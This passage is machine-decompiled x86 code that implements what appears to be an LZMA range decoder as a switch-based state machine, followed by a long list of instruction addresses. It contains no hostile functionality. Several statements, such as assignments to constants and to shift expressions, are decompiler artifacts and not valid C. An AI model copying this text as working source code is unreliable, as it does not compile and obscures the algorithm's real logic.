											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
